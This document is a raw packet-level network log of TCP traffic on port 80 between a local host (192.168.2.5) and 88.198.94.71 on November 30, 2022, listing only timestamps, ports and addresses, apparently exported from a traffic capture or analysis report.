Nov 30, 2022 00:22:31.658555031 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658565044 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658574104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658591986 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658608913 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658612967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658627987 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658637047 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658654928 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658663988 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658683062 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658689976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658720970 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658744097 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658771992 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658776999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658776999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658776999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658792019 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658797979 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658824921 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658828974 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658843994 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658849955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658864021 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658870935 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.658894062 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.658962965 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697225094 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697273970 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697300911 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697326899 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697351933 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697379112 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697403908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697428942 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697432995 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697453976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697477102 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697483063 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697491884 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697511911 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697515011 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697535992 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697540045 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697550058 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697567940 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697592974 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697611094 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697618961 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697639942 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697643995 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697666883 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697670937 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697685003 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697700024 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697711945 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697746038 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697828054 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697855949 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697880030 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697891951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697906017 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.697911978 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697931051 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.697948933 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698014021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698039055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698061943 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698082924 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698086023 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698113918 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698158026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698215961 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698241949 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698261023 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698266983 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698282003 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698292971 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698307991 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698379040 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698422909 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698447943 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698472023 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698491096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698513031 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698515892 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698535919 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698542118 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698558092 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698568106 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698580980 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698592901 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698609114 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698617935 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698632956 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698658943 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698717117 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698741913 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698765993 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698771000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698791027 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698791981 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698817015 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698818922 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698843002 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698846102 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698885918 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698904991 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.698926926 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698961973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698992014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.698999882 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699024916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699028015 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699059010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699060917 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699088097 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699095964 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699110985 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699131966 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699148893 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699167013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699189901 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699201107 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699235916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699235916 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699266911 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699290037 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699316025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699343920 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699378967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699400902 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699415922 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699450016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699466944 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699466944 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699486017 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699520111 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699522018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699532986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699557066 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699564934 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699593067 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699616909 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699628115 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699635983 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699664116 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699692011 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699700117 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699707031 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699738979 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699743986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699774981 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699783087 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699810982 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699825048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699841976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699876070 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699877977 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699893951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699913979 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699949026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699949980 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.699969053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.699990034 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.700005054 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.700026035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.700051069 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.700064898 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.700083971 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.700103998 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.700115919 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.700140953 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.700153112 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.700201035 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736087084 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736135006 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736162901 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736187935 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736207008 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736229897 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736254930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736279964 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736279011 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736305952 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736331940 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736334085 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736360073 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736371994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736376047 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736399889 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736426115 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736427069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736454010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736455917 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736478090 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736483097 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736509085 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736526012 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736536026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736552000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736562014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736571074 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736588001 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736592054 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736612082 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736618042 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736639023 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736639977 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736660004 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736665964 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736680031 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736685991 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736704111 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736704111 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736723900 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736732960 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736747026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736759901 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736777067 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736782074 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736800909 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736807108 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736819983 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736826897 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736843109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736849070 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736864090 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736876011 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736893892 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736898899 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736917973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736920118 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736942053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736942053 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736960888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.736972094 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.736996889 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737016916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737023115 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737045050 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737050056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737066031 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737081051 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737086058 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737101078 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737107038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737123966 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737131119 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737152100 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737159967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737169981 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737189054 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737191916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737210035 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737217903 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737240076 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737267017 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737281084 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737294912 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737312078 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737314939 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737341881 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737349987 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737369061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737381935 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737400055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737410069 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737428904 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737430096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737448931 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737457991 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737485886 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737498999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737505913 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737525940 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737531900 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737546921 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737561941 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737565994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737582922 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737585068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737605095 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737612963 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737623930 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737632036 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737651110 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.737657070 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.737698078 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738245964 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738276005 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738300085 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738327026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738353014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738359928 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738378048 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738385916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738404989 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738413095 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738432884 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738457918 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738460064 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738483906 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738497972 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738538980 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738569975 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738595009 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738619089 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738643885 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738648891 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738671064 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738676071 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738698959 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738722086 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738729954 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738750935 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738785028 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738790035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738814116 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738821030 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738847971 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738847971 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738893032 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738897085 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738931894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738934994 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.738960028 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738987923 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.738993883 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739002943 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739017010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739027023 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739044905 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739053011 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739067078 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739078999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739085913 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739104986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739104986 CET	80	49710	88.198.94.71	192.168.2.5
